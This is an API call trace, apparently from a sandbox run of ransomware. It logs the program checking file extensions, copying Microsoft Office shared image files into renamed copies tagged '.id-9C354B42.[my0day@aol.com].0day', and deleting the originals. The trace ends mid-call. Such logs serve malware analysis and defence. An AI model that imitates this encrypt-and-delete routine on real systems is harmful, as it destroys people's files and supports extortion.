[0042.609] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.609] lstrlenW (lpString=".docx") returned 5 [0042.609] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.609] lstrlenW (lpString=".pdf") returned 4 [0042.609] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.609] lstrlenW (lpString=".xls") returned 4 [0042.609] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.609] lstrlenW (lpString=".xlsx") returned 5 [0042.609] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.609] lstrlenW (lpString=".ppt") returned 4 [0042.609] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".zip") returned 4 [0042.610] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString=".rar") returned 4 [0042.610] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString=".bz2") returned 4 [0042.610] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.610] lstrlenW (lpString=".7z") returned 3 [0042.610] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".dbf") returned 4 [0042.610] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".1cd") returned 4 [0042.610] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".jpg") returned 4 [0042.610] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".doc") returned 4 [0042.610] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.610] lstrlenW (lpString=".docx") returned 5 [0042.610] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.610] lstrlenW (lpString=".pdf") returned 4 [0042.610] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString=".xls") returned 4 [0042.610] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString=".xlsx") returned 5 [0042.610] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.610] lstrlenW (lpString=".ppt") returned 4 [0042.610] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.610] lstrlenW (lpString=".zip") returned 4 [0042.610] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.611] lstrlenW (lpString=".rar") returned 4 [0042.611] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.611] lstrlenW (lpString=".bz2") returned 4 [0042.611] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.611] lstrlenW (lpString=".7z") returned 3 [0042.611] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.611] lstrlenW (lpString=".dbf") returned 4 [0042.611] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.611] lstrlenW (lpString=".1cd") returned 4 [0042.611] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0042.611] lstrlenW (lpString=".jpg") returned 4 [0042.611] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.611] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0042.611] lstrlenW (lpString="HandPrints.jpg") returned 14 [0042.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.611] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=4222) returned 1 [0042.611] CloseHandle (hObject=0x174) returned 1 [0042.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0042.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.612] lstrlenW (lpString=".doc") returned 4 [0042.612] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.612] lstrlenW (lpString=".docx") returned 5 [0042.612] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.612] lstrlenW (lpString=".pdf") returned 4 [0042.612] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.612] lstrlenW (lpString=".xls") returned 4 [0042.612] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.612] lstrlenW (lpString=".xlsx") returned 5 [0042.612] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.612] lstrlenW (lpString=".ppt") returned 4 [0042.612] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.612] lstrlenW (lpString=".zip") returned 4 [0042.612] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.612] lstrlenW (lpString=".rar") returned 4 [0042.612] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.612] lstrlenW (lpString=".bz2") returned 4 [0042.612] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.612] lstrlenW (lpString=".7z") returned 3 [0042.612] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0042.613] lstrlenW (lpString=".dbf") returned 4 [0042.613] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0043.452] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.452] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.664] GetLastError () returned 0x0 [0043.664] ReadFile (in: hFile=0x1fc, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xb20, lpOverlapped=0x0) returned 1 [0043.666] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xb30, lpOverlapped=0x0) returned 1 [0043.666] ReadFile (in: hFile=0x1fc, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.666] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.666] SetEndOfFile (hFile=0x198) returned 1 [0043.667] CloseHandle (hObject=0x198) returned 1 [0043.844] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.846] SetEndOfFile (hFile=0x1fc) returned 1 [0044.101] CloseHandle (hObject=0x1fc) returned 1 [0044.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.102] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1 [0044.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.102] lstrlenW (lpString=".doc") returned 4 [0044.102] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.102] lstrlenW (lpString=".docx") returned 5 [0044.102] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.102] lstrlenW (lpString=".pdf") returned 4 [0044.102] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.102] lstrlenW (lpString=".xls") returned 4 [0044.102] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.102] lstrlenW (lpString=".xlsx") returned 5 [0044.102] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.102] lstrlenW (lpString=".ppt") returned 4 [0044.102] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.102] lstrlenW (lpString=".zip") returned 4 [0044.102] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.102] lstrlenW (lpString=".rar") returned 4 [0044.102] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.102] lstrlenW (lpString=".bz2") returned 4 [0044.102] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.102] lstrlenW (lpString=".7z") returned 3 [0044.102] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.102] lstrlenW (lpString=".dbf") returned 4 [0044.102] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".1cd") returned 4 [0044.103] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".jpg") returned 4 [0044.103] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".doc") returned 4 [0044.103] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.103] lstrlenW (lpString=".docx") returned 5 [0044.103] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.103] lstrlenW (lpString=".pdf") returned 4 [0044.103] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString=".xls") returned 4 [0044.103] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString=".xlsx") returned 5 [0044.103] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.103] lstrlenW (lpString=".ppt") returned 4 [0044.103] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".zip") returned 4 [0044.103] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString=".rar") returned 4 [0044.103] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.103] lstrlenW (lpString=".bz2") returned 4 [0044.103] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.103] lstrlenW (lpString=".7z") returned 3 [0044.103] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".dbf") returned 4 [0044.103] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.103] lstrlenW (lpString=".1cd") returned 4 [0044.103] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0044.104] lstrlenW (lpString=".jpg") returned 4 [0044.104] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.104] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.104] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.113] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=27407) returned 1 [0044.113] CloseHandle (hObject=0x1c4) returned 1 [0044.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20 [0044.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.113] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.116] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.116] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.124] GetLastError () returned 0x0 [0044.124] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x6b0f, lpOverlapped=0x0) returned 1 [0044.153] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x6b10, lpOverlapped=0x0) returned 1 [0044.154] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.155] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.155] SetEndOfFile (hFile=0x208) returned 1 [0044.155] CloseHandle (hObject=0x208) returned 1 [0044.155] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.155] SetEndOfFile (hFile=0x1c4) returned 1 [0044.156] CloseHandle (hObject=0x1c4) returned 1 [0044.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.156] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0044.156] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.156] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.156] lstrlenW (lpString=".doc") returned 4 [0044.156] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.156] lstrlenW (lpString=".docx") returned 5 [0044.156] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.156] lstrlenW (lpString=".pdf") returned 4 [0044.156] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.156] lstrlenW (lpString=".xls") returned 4 [0044.156] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.156] lstrlenW (lpString=".xlsx") returned 5 [0044.156] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.156] lstrlenW (lpString=".ppt") returned 4 [0044.157] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".zip") returned 4 [0044.157] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.157] lstrlenW (lpString=".rar") returned 4 [0044.157] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.157] lstrlenW (lpString=".bz2") returned 4 [0044.157] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString=".7z") returned 3 [0044.157] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".dbf") returned 4 [0044.157] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".1cd") returned 4 [0044.157] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".jpg") returned 4 [0044.157] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".doc") returned 4 [0044.157] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString=".docx") returned 5 [0044.157] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.157] lstrlenW (lpString=".pdf") returned 4 [0044.157] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.157] lstrlenW (lpString=".xls") returned 4 [0044.157] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.157] lstrlenW (lpString=".xlsx") returned 5 [0044.157] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.157] lstrlenW (lpString=".ppt") returned 4 [0044.157] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.157] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.157] lstrlenW (lpString=".zip") returned 4 [0044.158] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.158] lstrlenW (lpString=".rar") returned 4 [0044.158] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.158] lstrlenW (lpString=".bz2") returned 4 [0044.158] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.158] lstrlenW (lpString=".7z") returned 3 [0044.158] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.158] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.158] lstrlenW (lpString=".dbf") returned 4 [0044.158] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.158] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.158] lstrlenW (lpString=".1cd") returned 4 [0044.158] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.158] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.158] lstrlenW (lpString=".jpg") returned 4 [0044.158] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.158] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.158] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.158] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=945) returned 1 [0044.158] CloseHandle (hObject=0x1c4) returned 1 [0044.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20 [0044.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.159] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.159] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.206] GetLastError () returned 0x0 [0044.206] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x3b1, lpOverlapped=0x0) returned 1 [0044.214] WriteFile (in: hFile=0x20c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3c0, lpOverlapped=0x0) returned 1 [0044.215] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, 